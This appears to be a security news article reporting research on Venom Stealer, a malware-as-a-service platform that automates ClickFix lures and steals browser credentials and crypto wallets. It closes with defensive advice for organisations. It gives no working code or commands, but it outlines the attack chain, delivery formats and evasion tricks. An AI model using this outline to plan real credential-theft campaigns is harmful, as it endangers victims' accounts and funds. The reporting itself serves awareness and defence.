ClickFix Attacks Go Fully Automated With a New MaaS Offering
Crafting sophisticated ClickFix-style attacks no longer requires deep technical expertise. A newly identified malware-as-a-service (MaaS) platform called Venom Stealer has emerged on cybercriminal forums, automating every phase of the social engineering technique and placing powerful credential-theft capabilities within reach of nearly any would-be attacker. Researchers at BlackFog disclosed details about the platform in a report published on Tuesday, April 1, 2026.
The developer behind the service operates under the alias "VenomStealer" and markets the platform across criminal underground networks. According to BlackFog founder and CEO Darren Williams, Venom Stealer is not simply another commodity infostealer — it represents a more complete and persistent attack pipeline than tools like Lumma, Vidar, and RedLine.
"Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting. It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running." — Darren Williams, BlackFog
Pricing, Licensing, and Business Structure
Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," Venom Stealer is sold on a subscription model priced at $250 per month or $1,800 for lifetime access. The operation includes a vetted application process, Telegram-based licensing, and a 15% affiliate program. Operators receive a native C++ binary payload compiled specifically for them through the platform's web panel.
Despite being a relatively recent entrant to the MaaS market, the operation behind Venom Stealer already shows signs of active development. Williams noted that during March 2026 alone, the developer shipped multiple updates to the platform, suggesting a well-maintained and actively evolving criminal enterprise.
How the Attack Chain Works
Step 1: The ClickFix Lure
An attack begins when a target lands on a ClickFix page hosted by the operator. The platform ships four templates per platform — covering both Windows and macOS — including:
- A fake Cloudflare CAPTCHA page
- A fake operating system update prompt
- A fake SSL certificate error
- A fake font installation page
Each template instructs the victim to open a Run dialog or Terminal window, copy and paste a command, and press Enter. As Williams explained, because the target personally initiates the execution, the process appears user-initiated and bypasses detection logic built around parent-child process relationships.
Step 2: Payload Delivery
On Windows, the available payload formats include .exe, .psi (or fileless via PowerShell), .hta, and .bat options. macOS templates rely on bash and curl. Operators can also configure custom domains through Cloudflare DNS, ensuring the panel URL never appears directly in the delivered command — a technique designed to obscure the infrastructure behind the attack.
Step 3: Credential and Data Harvesting
Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine. Extracted data includes saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every browser profile present.
Particularly notable are the evasion capabilities embedded in the execution mode. The encryption protecting credentials in Chrome versions 10 and 20 is bypassed through a silent privilege escalation technique that extracts the decryption key without triggering any User Account Control (UAC) dialog, leaving no forensic artifacts behind. The attack chain also captures system fingerprinting data and browser extension inventories, giving operators a complete profile of each compromised target.
"All of this data leaves the infected device immediately, with little or no local staging or delay. Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult." — Darren Williams, BlackFog
Persistent Post-Compromise Pipeline
Automated Cryptocurrency Wallet Cracking
Any cryptocurrency wallet data discovered during the sweep is transferred to a server-side, GPU-powered cracking engine that automatically targets wallets from a wide range of platforms, including:
- MetaMask
- Phantom
- Solflare
- Trust Wallet
- Atomic
- Exodus
- Electrum
- Bitcoin Core
- Monero
- Tonkeeper
A March 9 update to Venom Stealer added a File Password and Seed Finder feature, which searches the entire filesystem for locally saved seed phrases and feeds anything found into the cracking pipeline. Williams warned that even users who avoid storing credentials in their browsers remain at risk if seed phrases exist anywhere on their machine.
Real-Time Credential Monitoring
Unlike most infostealers that execute once and exit, Venom Stealer maintains persistence after the initial compromise. It continuously monitors Chrome's Login Data file, capturing newly saved credentials in real time. According to Williams, this undermines credential rotation as an incident response strategy and extends the exfiltration window far beyond the initial infection event.
"This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection. As a result, determining the full scope of the ongoing compromise becomes more difficult." — Darren Williams, BlackFog
Background: The Rise of ClickFix Attacks
Researchers from Proofpoint first identified ClickFix attacks approximately two years ago. Since then, the technique has gained significant traction across the cybercriminal community. The method works by instilling urgency in targets — telling them something is broken and must be fixed or updated — while using CAPTCHA-style prompts to create a false sense of legitimacy. The ultimate goal is to manipulate users into executing malicious commands against themselves, turning the victim into an unwitting accomplice in their own compromise.
Defensive Measures Organizations Can Take
Williams outlined several concrete steps organizations can take to reduce their exposure to platforms like Venom Stealer:
- Restrict PowerShell execution to prevent fileless payload delivery.
- Disable the Run dialog for standard users via Group Policy to block a key initial execution vector.
- Train employees to recognize ClickFix-style social engineering, particularly fake CAPTCHA pages and software update prompts.
- Monitor and control outbound traffic to detect or block data exfiltration activity after an initial compromise.
As Williams put it: "Once the payload is running, the attack chain depends on data leaving the device. Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions."
The commoditization of ClickFix attacks through platforms like Venom Stealer signals a continued lowering of the barrier to entry for sophisticated, multi-stage credential theft campaigns — making employee awareness and robust outbound traffic controls more critical than ever.
Source: Dark Reading